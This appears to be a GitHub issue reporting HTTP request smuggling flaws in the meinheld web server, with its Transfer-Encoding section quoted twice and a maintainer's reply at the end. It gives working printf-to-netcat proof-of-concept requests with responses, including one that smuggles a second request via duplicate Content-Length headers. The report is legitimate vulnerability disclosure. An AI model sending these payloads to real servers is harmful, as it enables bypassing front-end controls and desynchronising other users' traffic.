Non-proper handling of Content-Length and Transfer-Encoding headers

**Double Content-Length Headers**

When presented with two content-length headers, meinheld ignored the first header. When the second content-length was set to zero, it caused meinheld to interpret the request body as a pipelined request.

> According to RFC 7230 Section 3.3.3#4, if a message is received with multiple content-length headers with differing value, then the server must reject the message with a 400 response.

Request
```
printf 'GET /xx HTTP/1.1\r\n'\
'Host:localhost\r\n'\
'Content-Length: 3\r\n'\
'Content-Length: 1\r\n'\
'\r\n'\
'abc\r\n'\
'\r\n'\
| nc 127.0.0.1 8000
```

Response
```
HTTP/1.0 400 Bad Request
Content-Type: text/html
Server: meinheld/1.0.1
```


Request
```
printf 'GET /xx HTTP/1.1\r\n'\
'Host:localhost\r\n'\
'Content-Length: 1\r\n'\
'Content-Length: 3\r\n'\
'\r\n'\
'abc\r\n'\
'\r\n'\
| nc 127.0.0.1 8000
```


Response
```
HTTP/1.1 200 OK
Server: meinheld/1.0.1
Date: Tue, 31 Mar 2020 08:27:53 GMT
Content-type: text/plain
Content-Length: 13
Connection: close

Hello world!
```

Request
```
printf 'GET / HTTP/1.1\r\n'\
'Host: localhost\r\n'\
'Content-Length: 36\r\n'\
'Content-Length: 0\r\n'\
'\r\n'\
'GET /smuggled HTTP/1.1\r\n'\
'Host: localhost\r\n'\
'\r\n'\
|nc 127.0.0.1 8000
```

Response
```
HTTP/1.1 200 OK
Server: meinheld/1.0.1
Date: Tue, 31 Mar 2020 08:33:54 GMT
Content-type: text/plain
Content-Length: 13
Connection: close

Hello world!
HTTP/1.1 200 OK
Server: meinheld/1.0.1
Date: Tue, 31 Mar 2020 08:33:54 GMT
Content-type: text/plain
Content-Length: 13
Connection: close

Hello world!
```

As shown above, both the / and the smuggled request to the path [/smuggled] were successfully resolved.

See this for an example:
https://know.bishopfox.com/advisories/twisted-version-19.10.0


**Invalid Transfer-Encoding**

meinheld would parse the Transfer-Encoding header and only look for a single string value, if that value was not chunked it would fall through and use the Content-Length header instead.

> According to the HTTP standard Transfer-Encoding should be a comma separated list, with the inner-most encoding first, followed by any further transfer codings, ending with chunked.

Requests sent with:
`Transfer-Encoding: gzip, chunked
`
Would incorrectly get ignored, and the request would use a Content-Length header instead to determine the body size of the HTTP message.

This could allow for meinheld to treat a single request as multiple requests in the case of HTTP pipelining.


Request
```
printf 'GET /xxxx HTTP/1.1\r\n'\
'Content-Length: 2\r\n'\
'Transfer-Encoding: gzip, chunked\r\n'\
'Host: localhost\r\n'\
'\r\n'\
'0000\r\n'\
'\r\n'\
| nc 127.0.0.1 8000
```

Response
```
HTTP/1.0 400 Bad Request
Content-Type: text/html
Server: meinheld/1.0.1
```

Request
```
printf 'GET /xxxx HTTP/1.1\r\n'\
'Content-Length: 4\r\n'\
'Transfer-Encoding: gzip, chunked\r\n'\
'Host: localhost\r\n'\
'\r\n'\
'0000\r\n'\
'\r\n'\
| nc 127.0.0.1 8000
```

Response
```
HTTP/1.1 200 OK
Server: meinheld/1.0.1
Date: Tue, 31 Mar 2020 09:13:41 GMT
Content-type: text/plain
Content-Length: 13
Connection: close

Hello world!
```



More info on smuggling attacks:
https://hackerone.com/reports/648434
https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn



> **Invalid Transfer-Encoding**
> 
> meinheld would parse the Transfer-Encoding header and only look for a single string value, if that value was not chunked it would fall through and use the Content-Length header instead.
> 
> > According to the HTTP standard Transfer-Encoding should be a comma separated list, with the inner-most encoding first, followed by any further transfer codings, ending with chunked.
> 
> Requests sent with:
> `Transfer-Encoding: gzip, chunked `
> Would incorrectly get ignored, and the request would use a Content-Length header instead to determine the body size of the HTTP message.
> 
> This could allow for meinheld to treat a single request as multiple requests in the case of HTTP pipelining.
> 
> Request
> 
> ```
> printf 'GET /xxxx HTTP/1.1\r\n'\
> 'Content-Length: 2\r\n'\
> 'Transfer-Encoding: gzip, chunked\r\n'\
> 'Host: localhost\r\n'\
> '\r\n'\
> '0000\r\n'\
> '\r\n'\
> | nc 127.0.0.1 8000
> ```
> 
> Response
> 
> ```
> HTTP/1.0 400 Bad Request
> Content-Type: text/html
> Server: meinheld/1.0.1
> ```
> 
> Request
> 
> ```
> printf 'GET /xxxx HTTP/1.1\r\n'\
> 'Content-Length: 4\r\n'\
> 'Transfer-Encoding: gzip, chunked\r\n'\
> 'Host: localhost\r\n'\
> '\r\n'\
> '0000\r\n'\
> '\r\n'\
> | nc 127.0.0.1 8000
> ```
> 
> Response
> 
> ```
> HTTP/1.1 200 OK
> Server: meinheld/1.0.1
> Date: Tue, 31 Mar 2020 09:13:41 GMT
> Content-type: text/plain
> Content-Length: 13
> Connection: close
> 
> Hello world!
> ```
> 
> More info on smuggling attacks:
> https://hackerone.com/reports/648434
> https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn


See this for an example:
https://github.com/Pylons/waitress/security/advisories/GHSA-g2xc-35jw-c63p

@playsec Thank you for the report.
I'd like to fix that as soon as possible.